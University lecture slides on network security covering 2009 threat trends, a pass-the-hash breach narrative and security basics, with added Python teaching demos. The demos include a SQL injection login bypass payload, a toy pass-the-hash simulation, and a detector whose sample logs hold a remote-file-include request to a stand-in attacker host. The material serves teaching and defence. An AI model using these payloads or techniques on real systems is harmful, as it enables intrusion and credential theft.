
NETE0519 & ISEC0513 Computer Network Security

Supakorn Kungpisdan, Ph.D.
supakorn@mut.ac.th

Supakorn Kungpisdan
- Education
  - PhD (Computer Science and Software Engineering), Monash University, Australia
  - M.Eng. (Computer Engineering), KMUTT
- Specializations
  - Information and Network Security, Electronic Commerce, Formal Methods, Computer Networking
- Experiences
  - Associate Dean (Research), FIST
  - Director, Master of Science in Network Engineering, MUT
- http://supakorn.mut.ac.th/
- http://www.msne.mut.ac.th/
NETE0519-ISEC0513 2

Course Descriptions
- Textbook
  - W. Stallings: Cryptography and Network Security, 4th Edition, Pearson Prentice Hall, ISBN 0-13-202322-9
- Supplementary materials
  - M. E. Whitman and H. J. Mattord: Principles of Information Security, 3rd Edition, Thomson, ISBN 1-4239-0177-0
  - G. De Laet and G. Schauwers: Network Security Fundamentals, Cisco Press, ISBN 1-58705-167-2
- http://www.msne.mut.ac.th/

Evaluation Criteria
- Quizzes 10%
- Lab 30%
- Midterm exam 20%
- Final exam 40%

Course Outlines
- Network Security Overview
- Information Security
  - Symmetric Cryptography, Public-key Cryptography, Hash Functions and MAC
- Network Security
  - IP Security, Web Security, Email Security, Firewalls, Intrusion Detection Systems
- Security Management
  - Security Standards and Policy

The Top Cyber Security Risks


http://www.sans.org/top-cyber-security-risks/

Network Security Trends in 2009

Priority One: Client-side Software that Remains Unpatched
- Targeted email attacks, often called spear phishing, exploit client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office.
- The same client-side vulnerabilities are exploited when users visit infected web sites.
- On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities.
- The highest-priority risk is getting less attention than the lower-priority risk.

Priority Two: Vulnerable Internet-facing Websites
- Attacks against web applications constitute more than 60% of the total Internet attacks.
- These vulnerabilities are being exploited widely to convert trusted web sites into malicious web sites serving content that contains client-side exploits.
- More than 80% of vulnerabilities are web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications.

Rising Numbers of Zero-day Vulnerabilities
- Over the past 3 years, the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times, has increased.
- Some vulnerabilities have remained unpatched for as long as two years.
- There is a corresponding shortage of highly skilled vulnerability researchers working for governments and software vendors.
- Check for upcoming zero-day advisories at http://www.zerodayinitiative.com/advisories/upcoming/

Application Vulnerabilities Exceed OS Vulnerabilities
- Due to the current trend of converting trusted web sites into malicious servers, browsers and the client-side applications that browsers can invoke are consistently targeted.

Web Application Attacks
- Two main avenues for exploiting and compromising web servers: brute-force password guessing attacks and web application attacks.
- Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified.
- SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites.
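The SQL injection technique named above, shown on a login check, as an added example that is not part of the original slides or of the SANS report: the first function builds the query by string concatenation, the second binds the same inputs as parameters. The in-memory SQLite table, the user names and the placeholder hash strings are constructed for this illustration.

```python
"""Login check two ways: string-built SQL (injectable) beside a parameterized query.

Added example, not from the original slides; the table and its rows are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample user table (the 'hashes' are placeholder strings)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-pw", 0), ("admin", "hash-of-admin-pw", 1)],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, pw_hash: str):
    """Concatenates user input into the statement, so the input is parsed as SQL.

    Returns the matched (username, is_admin) row or None.
    """
    sql = (
        "SELECT username, is_admin FROM users WHERE username = '" + username
        + "' AND pw_hash = '" + pw_hash + "'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, pw_hash: str):
    """Same check with bound parameters: the input is always data, never SQL syntax."""
    sql = "SELECT username, is_admin FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone()


def demo() -> dict:
    """Run the classic comment-out payload against both implementations."""
    conn = make_db()
    payload = "admin' --"   # closes the string literal, then comments out the password clause
    return {
        "vulnerable": login_vulnerable(conn, payload, "wrong"),
        "parameterized": login_parameterized(conn, payload, "wrong"),
        "legit": login_parameterized(conn, "alice", "hash-of-alice-pw"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:14s} -> {row}")
```

With the `admin' --` payload the vulnerable version returns the admin row without any valid password, because the statement it executes is `... WHERE username = 'admin' --' AND pw_hash = 'wrong'` and everything after `--` is a comment; the parameterized version looks for a user literally named `admin' --` and finds nothing. PHP remote file include is the same class of flaw one layer up: untrusted input reaching an interpreter (`include`) as code rather than as data.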

Windows: Conficker/Downadup
- Attacks on Microsoft Windows operating systems were dominated by the Conficker (aka Downadup) worm and its five variants, first detected in November 2008.
- More than 5 million computers in 200 countries were infected.
- For the past six months, over 90% of the attacks recorded against Microsoft software targeted the buffer overflow vulnerability described in Microsoft Security Bulletin MS08-067 (the Server service RPC flaw through which Conficker spreads).
- Believed to be the largest computer worm infection since the 2003 SQL Slammer.

Conficker

http://en.wikipedia.org/wiki/Conficker

Attacks on Critical Microsoft Vulnerabilities (Mar-Sept 2009)

Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Apple: QuickTime and Six More
- Apple has released patches for many vulnerabilities in QuickTime over the past year.
- QuickTime vulnerabilities account for most of the attacks being launched against Apple software.
- Note that QuickTime runs on both Mac and Windows operating systems.
- The following vulnerabilities should be patched on any QuickTime installation: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957

Attacks on Critical Apple Vulnerabilities (Mar-Sept 2009)

NETE0519-ISEC0513

17

Origin and Destination Analysis for Key Attacks
- The categories analysed are: Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and SQL Injection attacks.

Server-Side HTTP Attacks by Destination Country (Mar-Sept 2009)

Server-Side HTTP Attacks by Source Country (Mar-Sept 2009)

SQL Injection Attacks by Destination Country (Mar-Sept 2009)

SQL Injection Attacks by Source Country (Mar-Sept 2009)

Remote PHP File Include Attack
- With the exception of a major attack originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average.

PHP Remote File Include Attacks by Source Country (Mar-Sept 2009)

Application Patching is Much Slower than Operating System Patching

Qualys Top 10 application vulnerabilities in H1 2009
1. WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
2. Sun Java Multiple Vulnerabilities (244988 and others)
3. Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges (238905)
4. Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
5. Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
6. Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
7. Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
8. Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
9. Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
10. Sun Java JDK/JRE Multiple Vulnerabilities (254569)

Microsoft OS Vulnerabilities

Application Vulnerabilities Patching Cycles

Tutorial: Real Life HTTP Client-side Exploitation Example
- Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today against Windows machines:
  - Exploitation of client-side software
  - Pass-the-hash attacks

Step 0: Attacker Places Content on Trusted Site
- The attacker begins by placing content on a trusted third-party website, e.g. a social networking, blogging, or photo sharing website, or any other web server that hosts content posted by public users.
- The attacker's content includes exploitation code for unpatched client-side software.

Step 1: Client-Side Exploitation
- A user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, e.g. a media player (Real Player, Windows Media Player), a document viewer (Acrobat Reader), or an office suite (Microsoft Word, Excel, PowerPoint, etc.).

Step 2: Establish Reverse Shell Backdoor Using HTTPS
- The attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access to the victim machine, communicating with the attacker over an outbound HTTPS connection initiated by the victim. Because the connection is opened from inside the network and looks like ordinary encrypted web browsing, it passes egress firewalls that allow outbound HTTPS, and its contents are hidden from a signature-based NIDS unless TLS is intercepted.

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot
- The attacker uses shell access on the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited-privilege user account to full SYSTEM privileges on this machine.
- With those privileges the attacker dumps the password hashes stored on the machine (Step 3).
- Instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network (Step 4): a fully patched client system on which this same victim user has full administrative privileges.

Step 5: Pass the Hash to Compromise Domain Controller


Step 5: Pass the Hash to Compromise Domain Controller (cont.)
- The attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller.
- Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical: the NT hash is an unsalted MD4 of the password, so it does not depend on the account name or the machine, and in NTLM authentication the hash itself is sufficient to produce a valid response.
- Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.
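Why identical passwords give identical hashes, and why the hash alone is enough to authenticate (Steps 3 to 5 above), as an added example that is not from the original slides. The NT hash is MD4 over the UTF-16LE password with no salt; MD4 is implemented inline because `hashlib` lacks it on many OpenSSL 3 builds. The challenge/response follows the NTLMv2 structure (HMAC-MD5 keyed from the NT hash) in simplified form: the client blob, host names, account names, passwords and the server challenge are constructed, and `Host` is a toy stand-in for a Windows SAM or domain account database, not a real NTLM implementation.

```python
"""NT hashes are unsalted and are themselves the NTLM credential.

Added example, not from the original slides. MD4 is implemented inline because
hashlib lacks it on many OpenSSL 3 builds. Host/account names, passwords, the
server challenge and the client blob are constructed; Host is a toy stand-in
for a Windows SAM / domain account database, not a real NTLM implementation.
"""
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: 3 rounds of 16 steps over 64-byte blocks, little-endian words."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    # (mix function, message-word order, rotation amounts, additive constant) per round
    rounds = (
        (lambda b, c, d: (b & c) | (~b & d), range(16), (3, 7, 11, 19), 0),
        (lambda b, c, d: (b & c) | (b & d) | (c & d),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda b, c, d: b ^ c ^ d,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i, w in enumerate(order):
                a = _rotl((a + f(b, c, d) + x[w] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers for the next step
        h = [(v + r) & MASK for v, r in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)): no salt, no user or machine binding."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2-shaped proof (HMAC-MD5 keyed from the NT hash); the password is never needed."""
    v2_key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    return hmac.new(v2_key, challenge + blob, "md5").digest()


class Host:
    """Toy account database: like a SAM or NTDS.dit, it stores NT hashes, not passwords."""

    def __init__(self, domain: str, accounts: dict):
        self.domain = domain
        self.accounts = {user: nt_hash(pw) for user, pw in accounts.items()}

    def dump_hashes(self) -> dict:
        """What an attacker with SYSTEM privileges obtains in Step 3."""
        return dict(self.accounts)

    def authenticate(self, user: str, challenge: bytes, blob: bytes, response: bytes) -> bool:
        expected = ntlmv2_response(self.accounts[user], user, self.domain, challenge, blob)
        return hmac.compare_digest(expected, response)


def pass_the_hash(stolen_nt: bytes, user: str, target: Host, challenge: bytes) -> bool:
    """Steps 4/5: answer the target's challenge with a stolen hash; no cracking involved."""
    blob = b"\x01\x01" + b"\x00" * 6 + os.urandom(8)   # simplified NTLMv2 client blob
    response = ntlmv2_response(stolen_nt, user, target.domain, challenge, blob)
    return target.authenticate(user, challenge, blob, response)


def demo() -> dict:
    """Constructed replay of the slide scenario: local admin and domain admin share a password."""
    client = Host("ACME", {"Administrator": "Winter2009!", "victim": "letmein"})
    dc = Host("ACME", {"Administrator": "Winter2009!", "domadmin": "Winter2009!"})
    stolen = client.dump_hashes()
    challenge = bytes.fromhex("1122334455667788")   # fixed here; random from a real DC
    return {
        "same_password_same_hash": stolen["Administrator"] == dc.accounts["domadmin"],
        "pth_as_domadmin": pass_the_hash(stolen["Administrator"], "domadmin", dc, challenge),
        "other_hash_rejected": pass_the_hash(stolen["victim"], "domadmin", dc, challenge),
    }


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print(demo())
```

`demo()` reproduces the slide's scenario: the hash dumped from the client's local Administrator equals the domain controller's `domadmin` hash, so the attacker authenticates as domain admin without ever learning the password, while the hash of a different password is rejected. The defenses follow from the same property: a unique local administrator password per machine (so a dumped local hash opens nothing else), and no domain-admin logons to workstations where the hash could be dumped.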

Steps 6 and 7: Exfiltration
- With full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization.
- The attacker then exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Lecture 01 Network Security Overview


Supakorn Kungpisdan, Ph.D. supakorn@mut.ac.th

What is Security?
- The quality or state of being secure: to be free from danger.
- A successful organization should have multiple layers of security in place:
  - Information Security
  - Systems Security
  - Network Security
  - Security Management
  - Physical Security

Security Trends


C.I.A. Triangle
- Confidentiality
  - Ensure that information is accessible only to authorized parties
- Integrity
  - Ensure that information is not altered, in transit or in storage, by unauthorized parties, and that any alteration can be detected
- Availability
  - Ensure that the information on the system is available to authorized parties at appropriate times without interference or obstruction

Vulnerabilities, Threats, and Attacks
- Vulnerability
  - A weakness in the security system
  - E.g. a program flaw, poor security configuration, bad password policy
- Threat
  - A set of circumstances or people that potentially causes loss or harm to a system
- Attack
  - An action or series of actions intended to harm a system, typically by exploiting a vulnerability

Relationships among Different Security Components

Relationship of Threats and Vulnerabilities

How Hackers Exploit Weaknesses

Types of Attacks
- Interruption
  - Attack on Availability
- Interception
  - Attack on Confidentiality
- Modification
  - Attack on Integrity
  - Tampering with a resource
- Fabrication
  - Attack on Authenticity
  - Impersonation, masquerading

Passive VS Active Attacks
- Passive Attacks
  - The goal is to obtain information that is being transmitted.
  - E.g. release of message contents and traffic analysis
  - Difficult to detect: the attacker does not alter the data, so neither party realizes a third party is present
  - Often the reconnaissance that precedes an active attack
  - Corresponds to Interception
  - Best countered by prevention, e.g. encryption, rather than by detection
- Active Attacks
  - Involve modification of the data stream or creation of a false stream
  - E.g. masquerade, replay, message modification, denial of service
  - Can potentially be detected by security mechanisms
  - Correspond to Interruption, Modification, Fabrication

Hackers
- White Hat Hackers
- Grey Hat Hackers
- Script Kiddies
- Hacktivists
- Crackers or Black Hat Hackers

Malicious Codes
- Viruses
  - A destructive program that attaches itself to a host program or file, copies itself and spreads to other hosts
  - A virus replicates and remains undetected until it is activated, i.e. until the infected host is run
- Trojans
  - An externally harmless-looking program that contains malicious code
- Spyware
  - Software installed on a target machine that sends information back to a server controlled by its owner
- Worms
  - Unlike viruses, worms are independent of other programs or files and spread over the network by themselves; no trigger is needed.

Security at Each Layer
- A firewall combats a range of attacks, including some DoS attacks
- A proxy protects the application layer; it combats unauthorized access and packet spoofing
- NAT hides LAN addresses and topology
- Shielded twisted-pair (STP) cabling helps against network eavesdropping and signal interference
- A NIDS sensor monitors traffic at the network layer for known attack signatures
- IPSec is configured for VPN connections; it protects against masquerading, data manipulation, and unauthorized access
- The web server is configured against unauthorized access
- The mail server with antivirus protects against viruses and DoS attacks
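What the NIDS sensor in the list above actually does, as an added example that is not part of the original slides: signature matching over web-server request lines for the three attack classes the SANS trends section names (SQL injection, Cross-site Scripting, PHP remote file include). The log lines and the regular expressions are constructed for this illustration; production rule sets (Snort, ModSecurity) are far larger.

```python
"""Signature matching over web request lines, the way a NIDS/WAF rule engine works.

Added example, not from the original slides. The log lines are constructed
(not real traffic) and the three rules are deliberately small.
"""
import re
from urllib.parse import unquote_plus

# One benign request and one request per attack class from the SANS slides.
SAMPLE_REQUESTS = [
    '10.0.0.5 - - "GET /products?id=42 HTTP/1.1" 200',
    '203.0.113.9 - - "GET /products?id=42%27%20OR%201%3D1-- HTTP/1.1" 200',
    '203.0.113.9 - - "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200',
    '198.51.100.7 - - "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200',
]

SIGNATURES = {
    # tautology, UNION, trailing comment, quote-OR-quote
    "sql_injection": re.compile(r"(?i)(\bor\b\s+\d+\s*=\s*\d+|union\s+select|--\s*$|'\s*or\s*')"),
    # script tag, javascript: URL, inline event handler
    "xss": re.compile(r"(?i)(<script\b|javascript:|onerror\s*=)"),
    # a query parameter whose value is a remote URL (PHP include of attacker code)
    "php_rfi": re.compile(r"(?i)[?&]\w+=(https?|ftp)://"),
}

LOG_RE = re.compile(r'^(\S+) \S+ \S+ "(?:GET|POST) (\S+) HTTP/\d\.\d" (\d{3})')


def inspect(line: str):
    """Return (src_ip, decoded_path, [matching signature names]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, path, _status = m.groups()
    decoded = unquote_plus(path)          # normalise before matching: %27 -> ', %3C -> <
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return src, decoded, hits


def alerts(lines):
    """(src_ip, [signatures]) for every request that trips at least one rule."""
    out = []
    for line in lines:
        parsed = inspect(line)
        if parsed and parsed[2]:
            out.append((parsed[0], parsed[2]))
    return out


if __name__ == "__main__":
    for src, hits in alerts(SAMPLE_REQUESTS):
        print(f"ALERT {src}: {', '.join(hits)}")
```

The URL-decoding step before matching matters: the same payload sent as `%27%20OR%201%3D1` would otherwise slip past a literal rule, and attackers routinely use double encoding, case changes and SQL comments to do exactly that. Signatures are a detective control that catches known patterns; they do not replace parameterized queries and output encoding in the application itself.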

A Model for Network Security

A Model for Network Access Security

Security Controls

NSTISSC Security Model


Balancing Information Security and Access
- Impossible to obtain perfect security; it is a process, not a goal
- Security should be considered a balance between protection and availability
- To achieve balance, the level of security must allow reasonable access, yet protect against threats
- Give an example of a completely secure information system!


Approaches to Information Security Implementation: Bottom-Up Approach
- Grassroots effort: systems administrators attempt to improve the security of their systems
- Key advantage: technical expertise of individual administrators
- Seldom works, as it lacks a number of critical features:
  - Participant support
  - Organizational staying power

Approaches to Information Security Implementation: Top-Down Approach
- Initiated by upper management
  - Issue policy, procedures, and processes
  - Dictate goals and expected outcomes of the project
  - Determine accountability for each required action
- The most successful also involve a formal development strategy referred to as the systems development life cycle

Approaches to Information Security Implementation (cont.)


Information Security: Is it an Art or a Science?
- Implementation of information security is often described as a combination of art and science
- "Security artisan" idea: based on the way individuals have perceived systems technologists since computers became commonplace

Security as Art
- No hard and fast rules nor many universally accepted complete solutions
- No manual for implementing security through an entire system

Security as Science
- Dealing with technology designed to operate at high levels of performance
- Specific conditions cause virtually all actions that occur in computer systems
- Nearly every fault, security hole, and system malfunction is the result of the interaction of specific hardware and software
- If developers had sufficient time, they could resolve and eliminate these faults

Security as a Social Science
- Social science examines the behavior of individuals interacting with systems
- Security begins and ends with the people that interact with the system
- Security administrators can greatly reduce the levels of risk caused by end users, and create more acceptable and supportable security profiles

Questions?
Next week Symmetric Cryptography and Applications
